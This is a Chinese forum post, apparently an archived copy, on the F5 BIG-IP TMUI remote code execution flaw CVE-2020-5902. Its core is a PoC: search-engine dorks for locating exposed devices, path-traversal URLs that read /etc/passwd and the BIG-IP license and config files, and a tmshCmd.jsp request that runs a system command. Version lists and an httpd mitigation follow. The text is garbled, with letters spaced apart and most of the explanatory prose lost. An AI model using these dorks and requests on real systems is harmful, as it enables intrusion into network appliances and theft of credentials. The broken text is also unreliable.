搜索

[27343] 2020-07-06_F5BIG-IPTMUI(CVE-2020-5902)远程代码执行漏洞

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-19
2020-07-06_F5BIG-IPTMUI(CVE-2020-5902)远程代码执行漏洞 F 5   B I G - I P   T M U I   C V E - 2 0 2 0 - 5 9 0 2   n e a r s e c   N e a r S e c   2 0 2 0 - 0 7 - 0 6     0 x 0 1   F 5   B I G - I P     F 5   F 5 T M U I C V E - 2 0 2 0 - 5 9 0 2 0 x 0 2   P O C s h o d a n h t t p . f a v i c o n . h a s h : - 3 3 5 2 4 2 5 3 9 f o f a t i t l e = " B I G - I P & r e g ; -   R e d i r e c t " g o o g l e i n t i t l e : " B I G - I P "   i n u r l : " t m u i " h t t p s : / / t a r g e t / t m u i / l o g i n . j s p / . . ; / t m u i / l o c a l l b / w o r k s p a c e / f i l e R e a d . j s p ? f i l e N a m e = / e t c / p a s s w d h t t p s : / / t a r g e t / t m u i / l o g i n . j s p / . . ; / t m u i / l o c a l l b / w o r k s p a c e / f i l e R e a d . j s p ? f i l e N a m e = / e t c / h o s t s h t t p s : / / t a r g e t / t m u i / l o g i n . j s p / . . ; / t m u i / l o c a l l b / w o r k s p a c e / f i l e R e a d . j s p ? f i l e N a m e = / c o n f i g / b i g i p . l i c e n s e h t t p s : / / t a r g e t / t m u i / l o g i n . j s p / . . ; / t m u i / l o c a l l b / w o r k s p a c e / f i l e R e a d . j s p ? f i l e N a m e = / c o n f i g / b i g i p . c o n f h t t p s : / / t a r g e t / t m u i / l o g i n . j s p / . . ; / t m u i / l o c a l l b / w o r k s p a c e / t m s h C m d . j s p ? c o m m a n d = l i s t + a u t h + u s e r + a d m i n
0 x 0 3   0 x 0 4   1 )   使 2 )     h t t p d   3 )   4 )   B I G - I P   1 5 . x :   1 5 . 1 . 0 / 1 5 . 0 . 0 B I G - I P   1 4 . x :   1 4 . 1 . 0   ~   1 4 . 1 . 2 B I G - I P   1 3 . x :   1 3 . 1 . 0   ~   1 3 . 1 . 3 B I G - I P   1 2 . x :   1 2 . 1 . 0   ~   1 2 . 1 . 5 B I G - I P   1 1 . x :   1 1 . 6 . 1   ~   1 1 . 6 . 5 B I G - I P   1 5 . x :   1 5 . 1 . 0 . 4 B I G - I P   1 4 . x :   1 4 . 1 . 2 . 6 B I G - I P   1 3 . x :   1 3 . 1 . 3 . 4 B I G - I P   1 2 . x :   1 2 . 1 . 5 . 2 B I G - I P   1 1 . x :   1 1 . 6 . 5 . 2 t m s h e d i t   / s y s   h t t p d   a l l - p r o p e r t i e s i n c l u d e   ' < L o c a t i o n M a t c h   " . * . . ; . * " > R e d i r e c t   4 0 4   / < / L o c a t i o n M a t c h > '
5 )   6 )     h t t p d   I P T M U I 访 访 n e a r s e c   E S C   : w q s a v e   / s y s   c o n f i g r e s t a r t   s y s   s e r v i c e   h t t p d
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理